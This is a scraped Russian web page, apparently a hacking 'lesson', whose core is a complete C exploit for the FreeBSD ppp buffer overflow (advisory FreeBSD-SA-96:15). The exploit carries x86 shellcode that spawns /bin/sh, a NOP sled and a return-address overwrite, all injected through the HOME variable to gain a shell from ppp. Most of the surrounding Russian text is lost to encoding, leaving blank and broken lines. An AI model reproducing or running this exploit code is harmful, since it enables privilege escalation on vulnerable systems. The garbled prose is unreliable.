2211
| | UKA.ru | Gossip.ru | ! | massovka | vaticancitystate.ru | From 24.11.97
Lesson 020
----------

: ppp bug  FreeBSD.

     ppp,    FreeBSD-SA-96:15. 
 FreeBSD.  ,   .
  :

#include 
#include 
#include 

#define BUFFER_SIZE     156     /* size of the bufer to overflow */

#define OFFSET          -290    /* number of bytes to jump after the start
                                   of the buffer */

long get_esp(void) { __asm__("movl %esp,%eax\n"); }

main(int argc, char *argv[])
{
        char *buf = NULL;
        unsigned long *addr_ptr = NULL;
        char *ptr = NULL;
        char execshell[] =
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"  /* 20 bytes */
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";    /* 15 bytes, 57 total */
   
        int i,j;

        buf = malloc(4096);

        /* fill start of bufer with nops */

        i = BUFFER_SIZE-strlen(execshell);

        memset(buf, 0x90, i);
        ptr = buf + i;

        /* place exploit code into the buffer */

        for(i = 0; i < strlen(execshell); i++) 
                *ptr++ = execshell[i];

        addr_ptr = (long *)ptr;
        for(i=0;i < (104/4); i++)
                *addr_ptr++ = get_esp() + OFFSET;

        ptr = (char *)addr_ptr;
        *ptr = 0;

        setenv("HOME", buf, 1);

        execl("/usr/sbin/ppp", "ppp", NULL);
}

PS. Thanx to Psychotic and Sean B. HamorFor

123123
| | UKA.ru | Gossip.ru | lib.uka.ru | Flash memory: SD, MMC, miniSD, CF | From 24.11.97
! ! !. !

(15 )

(13 )


VAZHNO.RU
:
. . - .
- ! - , - :
- , []
uka.ru